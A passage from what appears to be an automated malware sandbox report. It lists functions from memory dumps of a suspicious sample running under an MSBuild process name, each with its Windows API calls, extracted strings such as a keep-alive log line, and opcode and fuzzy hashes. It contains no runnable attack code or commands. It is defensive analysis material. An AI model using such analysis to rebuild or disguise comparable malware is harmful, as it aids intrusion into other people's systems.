                                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                                            Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                            • String ID: pow
                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                            • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                            • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                                                            Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 1000655C
                                                                                                                                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                                                                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                            • String ID: *?$.
                                                                                                                                            • API String ID: 2667617558-3972193922
                                                                                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                            • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                            • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                            Function 0044DE89 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0044DA5C: GetOEMCP.KERNEL32(00000000,?,?,0044DCE5,?), ref: 0044DA87
                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044DD2A,?,00000000), ref: 0044DEFD
                                                                                                                                            • GetCPInfo.KERNEL32(00000000,0044DD2A,?,?,?,0044DD2A,?,00000000), ref: 0044DF10
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 546120528-1979702588
                                                                                                                                            • Opcode ID: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                                                                                                            • Instruction ID: df262af5b8aedb6acfa17e1c9bcd504f5ccc85cb1eacd95bde0bd7f7b44a6e87
                                                                                                                                            • Opcode Fuzzy Hash: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                                                                                                            • Instruction Fuzzy Hash: C2513370D042059EFB348F72C8856BBBBA5AF41304F14446FD0978B252D67DA94ACB99
                                                                                                                                            Function 0044485F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __alloca_probe_16__freea
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1635606685-1979702588
                                                                                                                                            • Opcode ID: b32cfc21b014397943d4768a8ec031577c5cd3872f76e05ce294e310fa9bfd45
                                                                                                                                            • Instruction ID: eda24c5a96448ea724016aad991a3c17b1a8d64d08c979da106213b1ff49c618
                                                                                                                                            • Opcode Fuzzy Hash: b32cfc21b014397943d4768a8ec031577c5cd3872f76e05ce294e310fa9bfd45
                                                                                                                                            • Instruction Fuzzy Hash: C3410772600116ABFB24AF75CC41B6F77A4DF85764B24412BF808DB251EB7CD840D799
                                                                                                                                            Function 00441789 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004417D0
                                                                                                                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00441850
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1834446548-1979702588
                                                                                                                                            • Opcode ID: 4e3f0789a83cd42ccf5d86220a06b2026318fdb8ffa18d035122962d44076112
                                                                                                                                            • Instruction ID: 2146db567d2bb220d29859169affe98659c958252d9561a70165c400765bfcbb
                                                                                                                                            • Opcode Fuzzy Hash: 4e3f0789a83cd42ccf5d86220a06b2026318fdb8ffa18d035122962d44076112
                                                                                                                                            • Instruction Fuzzy Hash: 7141E271B002599BFB20DF64CC80BE977B5EB48305F1081EAE54997261D779DEC1CB98
                                                                                                                                            Function 004496C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __cftof
                                                                                                                                            • String ID: u;~/$BG3i@
                                                                                                                                            • API String ID: 1622813385-1333258365
                                                                                                                                            • Opcode ID: 0e53b18c89b8a5a252250ce90d767f597698ce4f8bbb56296b0f5e4f7aee30ca
                                                                                                                                            • Instruction ID: bce913b95f802116dab1e577d75f3ddb0db760047eed59d17a61653a1e464538
                                                                                                                                            • Opcode Fuzzy Hash: 0e53b18c89b8a5a252250ce90d767f597698ce4f8bbb56296b0f5e4f7aee30ca
                                                                                                                                            • Instruction Fuzzy Hash: 3D31B632424115EAB7246E399C8687FB768DE41734B24072FF824DA5D1EA2CDC43A35D
                                                                                                                                            Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                            • String ID: image/jpeg
                                                                                                                                            • API String ID: 1291196975-3785015651
                                                                                                                                            • Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                                                                            • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                                                                            • Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                                                                            • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                                            Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                            • API String ID: 0-711371036
                                                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                                            Function 0044A438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A875,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A4E2
                                                                                                                                            • GetLastError.KERNEL32(?,0044A875,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?,00000000,?,?,00000000,?), ref: 0044A50B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 442123175-1979702588
                                                                                                                                            • Opcode ID: c39b9dd4969b82759b4a64fd6f6db30710fc12bbb1168e7814732e2b2553290a
                                                                                                                                            • Instruction ID: d2b0fdf121e4141f9d7aedeff3631e04d8df33b54a9a48bc31cf78ca303085e0
                                                                                                                                            • Opcode Fuzzy Hash: c39b9dd4969b82759b4a64fd6f6db30710fc12bbb1168e7814732e2b2553290a
                                                                                                                                            • Instruction Fuzzy Hash: 28318D31A002199BCB24CF69DD809DAF3F9EF88315F1084BAE909D7260D634ED91CB59
                                                                                                                                            Function 0044A359 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A895,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A3F4
                                                                                                                                            • GetLastError.KERNEL32(?,0044A895,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?,00000000,?,?,00000000,?), ref: 0044A41D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 442123175-1979702588
                                                                                                                                            • Opcode ID: b0ef3c2e6dfb1b8d3472dbcbd7cc921f28cd0bda6ef427c1a1c72b96cec88488
                                                                                                                                            • Instruction ID: e9c05e2c57ce44ee84f0e33fe03ef9ce333ea83921497ff6c8cd7e19a143d9c9
                                                                                                                                            • Opcode Fuzzy Hash: b0ef3c2e6dfb1b8d3472dbcbd7cc921f28cd0bda6ef427c1a1c72b96cec88488
                                                                                                                                            • Instruction Fuzzy Hash: 6021E131A002189FCB14CF59D984AE9B3F9EB48306F1004AEE90AD7211D774AE85CF29
                                                                                                                                            Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                            • String ID: image/png
                                                                                                                                            • API String ID: 1291196975-2966254431
                                                                                                                                            • Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                            • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                                                                            • Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                            • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                                                                            Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                            Strings
                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                            • API String ID: 481472006-1507639952
                                                                                                                                            • Opcode ID: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                                            • Opcode Fuzzy Hash: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                                            Function 00447174 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,0000000A), ref: 004471D4
                                                                                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 2279764990-1979702588
                                                                                                                                            • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                                                            • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                                                                                                            • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                                                            • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9
                                                                                                                                            Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strlen
                                                                                                                                            • String ID: : $Se.
                                                                                                                                            • API String ID: 4218353326-4089948878
                                                                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                            Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                            • API String ID: 481472006-2430845779
                                                                                                                                            • Opcode ID: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                                            • Opcode Fuzzy Hash: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                            Function 00433D2C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043419B
                                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 00434282
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 3761405300-1979702588
                                                                                                                                            • Opcode ID: 55f35760b53b456a169b3277dece2ce7442f289f493762303a99d350d49c20e8
                                                                                                                                            • Instruction ID: 152c00956f4b34dade641c512d66f5ecdeb636344f370a0960c3468f4f65043c
                                                                                                                                            • Opcode Fuzzy Hash: 55f35760b53b456a169b3277dece2ce7442f289f493762303a99d350d49c20e8
                                                                                                                                            • Instruction Fuzzy Hash: 2C21BCB5512300DAE760CF69F946B543BA8BB58314F10683AE90CCA3A1E3F4A9C1CB4D
                                                                                                                                            Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
